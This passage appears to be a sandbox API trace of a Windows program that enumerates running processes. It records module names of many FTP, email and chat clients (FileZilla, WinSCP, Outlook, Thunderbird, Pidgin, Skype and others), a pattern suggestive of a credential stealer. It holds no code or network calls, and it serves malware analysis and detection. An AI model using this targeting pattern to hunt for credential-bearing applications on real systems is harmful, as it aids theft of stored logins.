dwProcessId=0x1ac) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0085.060] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0085.061] CloseHandle (hObject=0x0) returned 0 [0085.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0085.062] CloseHandle (hObject=0x0) returned 0 [0085.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5c0 [0085.062] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0085.062] CloseHandle (hObject=0x5c0) returned 1 [0085.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5c0 [0085.062] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0085.062] CloseHandle (hObject=0x5c0) returned 1 [0085.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0085.062] CloseHandle (hObject=0x0) returned 0 [0085.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0085.062] CloseHandle (hObject=0x0) returned 0 [0085.062] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5c0 [0085.063] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0085.063] CloseHandle (hObject=0x5c0) returned 1 [0085.063] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5c0 [0085.063] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0085.063] CloseHandle (hObject=0x5c0) returned 1 [0085.063] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0x5c0 [0085.063] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.064] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1310000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="jeep cant dl.exe") returned 0x10 [0085.065] CloseHandle (hObject=0x5c0) returned 1 [0085.065] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x5c0 [0085.065] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.067] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1030000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="particularly.exe") returned 0x10 [0085.067] CloseHandle (hObject=0x5c0) returned 1 [0085.067] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x5c0 [0085.067] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.068] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="forge_prospective.exe") returned 0x15 [0085.069] CloseHandle (hObject=0x5c0) returned 1 [0085.069] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x5c0 [0085.069] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.070] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="engagemanager.exe") returned 0x11 [0085.071] CloseHandle (hObject=0x5c0) returned 1 [0085.071] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x5c0 [0085.071] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.072] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1280000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="falsepercent.exe") returned 0x10 [0085.072] CloseHandle (hObject=0x5c0) returned 1 [0085.073] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5c0 [0085.073] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.074] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1390000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="cool.exe") returned 0x8 [0085.074] CloseHandle (hObject=0x5c0) returned 1 [0085.074] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5c0 [0085.074] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.076] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="carefully.exe") returned 0xd [0085.077] CloseHandle (hObject=0x5c0) returned 1 [0085.077] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x208) returned 0x5c0 [0085.077] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.078] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8a0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="forced_cooking.exe") returned 0x12 [0085.079] CloseHandle (hObject=0x5c0) returned 1 [0085.079] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a0) returned 0x5c0 [0085.079] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.099] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1100000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="takes-mix.exe") returned 0xd [0085.099] CloseHandle (hObject=0x5c0) returned 1 [0085.099] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x5c0 [0085.100] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.101] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="somewhere.exe") returned 0xd [0085.101] CloseHandle (hObject=0x5c0) returned 1 [0085.101] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d8) returned 0x5c0 [0085.101] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.103] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="retention.exe") returned 0xd [0085.103] CloseHandle (hObject=0x5c0) returned 1 [0085.103] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5c0 [0085.103] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.105] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1380000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="villagesamefoo.exe") returned 0x12 [0085.105] CloseHandle (hObject=0x5c0) returned 1 [0085.105] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x798) returned 0x5c0 [0085.105] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.106] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x12e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="nonmedicines.exe") returned 0x10 [0085.107] CloseHandle (hObject=0x5c0) returned 1 [0085.107] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x600) returned 0x5c0 [0085.107] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.108] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11b0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="snow_attachment.exe") returned 0x13 [0085.109] CloseHandle (hObject=0x5c0) returned 1 [0085.109] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x540) returned 0x5c0 [0085.109] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.110] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x360000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="checkingmxlikewise.exe") returned 0x16 [0085.110] CloseHandle (hObject=0x5c0) returned 1 [0085.111] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x5c0 [0085.111] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.112] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2b0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ink.exe") returned 0x7 [0085.113] CloseHandle (hObject=0x5c0) returned 1 [0085.113] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7ac) returned 0x5c0 [0085.113] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.114] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ear.exe") returned 0x7 [0085.114] CloseHandle (hObject=0x5c0) returned 1 [0085.114] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x5c0 [0085.114] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.116] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x12c0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0085.116] CloseHandle (hObject=0x5c0) returned 1 [0085.116] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x304) returned 0x5c0 [0085.116] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.118] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc20000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0085.118] CloseHandle (hObject=0x5c0) returned 1 [0085.118] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x5c0 [0085.118] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.119] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0085.120] CloseHandle (hObject=0x5c0) returned 1 [0085.120] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5c0 [0085.120] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.121] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x90000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0085.122] CloseHandle (hObject=0x5c0) returned 1 [0085.122] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5c0 [0085.122] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.123] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xfc0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0085.123] CloseHandle (hObject=0x5c0) returned 1 [0085.124] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x620) returned 0x5c0 [0085.124] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.125] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xab0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0085.125] CloseHandle (hObject=0x5c0) returned 1 [0085.125] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5c0 [0085.125] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.127] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xbe0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0085.127] CloseHandle (hObject=0x5c0) returned 1 [0085.127] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5c0 [0085.127] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.129] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0085.129] CloseHandle (hObject=0x5c0) returned 1 [0085.129] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x360) returned 0x5c0 [0085.129] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.131] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0085.131] CloseHandle (hObject=0x5c0) returned 1 [0085.131] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x5c0 [0085.131] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.133] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0085.133] CloseHandle (hObject=0x5c0) returned 1 [0085.133] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x790) returned 0x5c0 [0085.133] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.134] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0085.135] CloseHandle (hObject=0x5c0) returned 1 [0085.135] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d4) returned 0x5c0 [0085.135] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.136] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xec0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0085.137] CloseHandle (hObject=0x5c0) returned 1 [0085.137] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x5c0 [0085.137] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.138] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x320000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0085.139] CloseHandle (hObject=0x5c0) returned 1 [0085.139] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5c0 [0085.139] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.140] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1310000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0085.140] CloseHandle (hObject=0x5c0) returned 1 [0085.140] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x5c0 [0085.141] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.142] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8c0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0085.142] CloseHandle (hObject=0x5c0) returned 1 [0085.142] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x5c0 [0085.142] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.144] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xfd0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0085.144] CloseHandle (hObject=0x5c0) returned 1 [0085.144] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x5c0 [0085.144] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.146] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9d0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0085.146] CloseHandle (hObject=0x5c0) returned 1 [0085.146] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x5c0 [0085.146] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.148] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1210000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0085.148] CloseHandle (hObject=0x5c0) returned 1 [0085.148] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x824) returned 0x5c0 [0085.148] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.149] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa80000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0085.150] CloseHandle (hObject=0x5c0) returned 1 [0085.150] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x834) returned 0x5c0 [0085.150] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.151] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xda0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0085.152] CloseHandle (hObject=0x5c0) returned 1 [0085.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5c0 [0085.152] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.153] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11d0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0085.153] CloseHandle (hObject=0x5c0) returned 1 [0085.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x5c0 [0085.154] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.155] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1220000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0085.155] CloseHandle (hObject=0x5c0) returned 1 [0085.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x864) returned 0x5c0 [0085.155] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.157] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xee0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0085.157] CloseHandle (hObject=0x5c0) returned 1 [0085.157] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x874) returned 0x5c0 [0085.157] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.159] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0085.159] CloseHandle (hObject=0x5c0) returned 1 [0085.159] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x5c0 [0085.159] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.161] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb10000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0085.161] CloseHandle (hObject=0x5c0) returned 1 [0085.161] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x894) returned 0x5c0 [0085.161] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.163] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0085.163] CloseHandle (hObject=0x5c0) returned 1 [0085.163] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a4) returned 0x5c0 [0085.163] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.164] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe70000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0085.165] CloseHandle (hObject=0x5c0) returned 1 [0085.165] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x5c0 [0085.165] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.166] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0085.167] CloseHandle (hObject=0x5c0) returned 1 [0085.167] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x5c0 [0085.167] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.168] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1120000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0085.168] CloseHandle (hObject=0x5c0) returned 1 [0085.168] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x5c0 [0085.169] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0085.170] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd50000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0085.170] CloseHandle (hObject=0x5c0) returned 1 [0085.170] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x5c0 [0085.170] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | 